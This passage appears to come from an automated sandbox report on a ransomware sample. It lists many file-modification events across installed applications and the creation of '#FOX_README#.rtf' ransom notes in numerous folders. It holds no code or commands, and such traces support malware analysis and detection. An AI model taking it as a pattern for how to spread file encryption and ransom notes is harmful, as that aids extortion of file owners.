Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-tabcontrol_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Boa_Vista f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-attach.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Winnipeg f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\EmptyDatabase.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\DigSig.api f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\SendMail.api f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\Accessible.tlb f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-6 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-coredump.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Palmer f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Vladivostok f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\fa.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Nicosia f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-options-api.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\buttons.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\chrome_proxy.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\blafdoc.css f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Thimphu f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-modules.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santarem f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Samara f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME-JAVAFX.txt f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\gmail.crx f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Petersburg f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\leftnav.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\management\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Enderbury f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.util.gui_1.7.0.v200903091627.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\MANIFEST.MF f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\mix.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Chita f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Majuro f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-filesystems.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Pohnpei f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Nipigon f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application.zh_CN_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\eclipse_update_120.jpg f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Bougainville f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\default.jfc f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Vancouver f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Rainy_River f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaTypewriterBold.ttf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-progress.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Zaporozhye f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Stockholm f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Brunei f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Goose_Bay f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\he.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\GRAY.pf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\MANIFEST.MF f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-spi-actions.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\currency.data f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annots.api f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Dawson_Creek f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\am.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_sv.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\jabswitch.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding_1.4.2.v20140729-1044.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\security\java.policy f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-charts.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-dialogs.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+2 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\chrome_200_percent.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.commons.codec_1.6.0.v201305230611.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jawt.h f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\UserControl.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240389.profile.gz f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.zh_CN_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Ushuaia f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Madrid f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Amman f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Tell_City f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cancun f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.jsp.jasper_1.0.400.v20130327-1442.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\MoveRead.rar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Sydney f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface_3.10.1.v20140813-1009.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jrunscript.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\about.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MET f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-filesystems.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\DenyLock.mpg f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\oracle.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\sk.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sampler_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\MANIFEST.MF f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-snaptracer.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STP f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Settings.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Reykjavik f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\vlc-48.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util-lookup_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-search_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-api.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javac.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\preface.htm f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.preferences_3.5.200.v20140224-1527.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\java-rmi.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-1 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_MoveDrop32x32.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic.zh_CN_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Chisinau f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-api-caching.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\chrome.VisualElementsManifest.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santa_Isabel f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightRegular.ttf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\MDIParent.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Whitehorse f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja 